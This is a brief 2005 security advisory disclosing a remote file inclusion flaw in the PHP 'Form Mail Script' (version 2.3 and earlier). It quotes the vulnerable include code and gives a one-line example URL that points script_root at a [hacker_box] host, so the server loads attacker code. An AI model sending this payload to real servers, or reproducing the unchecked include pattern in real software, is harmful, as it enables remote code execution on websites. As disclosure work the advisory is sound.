-- == -- == -- == -- == -- == -- == -- == -- == -- == -- Name: Form Mail Script (FS) Version: <= 2.3 (free/commercial) Homepage: http://www.stadtaus.com/ Author: Filip Groszynski (VXSfx) Date: 4 March 2005 -- == -- == -- == -- == -- == -- == -- == -- == -- == -- Vulnerable code in inc/formmail.inc.php: ... /***************************************************** ** Include functions *****************************************************/ include $script_root . 'inc/functions.inc.php'; include $script_root . 'inc/template.class.inc.php'; include $script_root . 'inc/template.ext.class.inc.php'; include $script_root . 'inc/formmail.class.inc.php'; ... include $script_root . 'languages/language.' . $language . '.inc.php'; ... -------------------------------------------------------- Example: if register_globals=on and allow_url_fopen=on: http://[victim]/[dir]/inc/formmail.inc.php?script_root=http://[hacker_box]/ -------------------------------------------------------- Fix and Vendor status: Vendor has been notified. -------------------------------------------------------- Contact: Author: Filip Groszynski <VXSfx> Location: Poland <Warsaw> Email: groszynskif <at> gmail <dot> com HP: http://shell.homeunix.org -- == -- == -- == -- == -- == -- == -- == -- == -- == --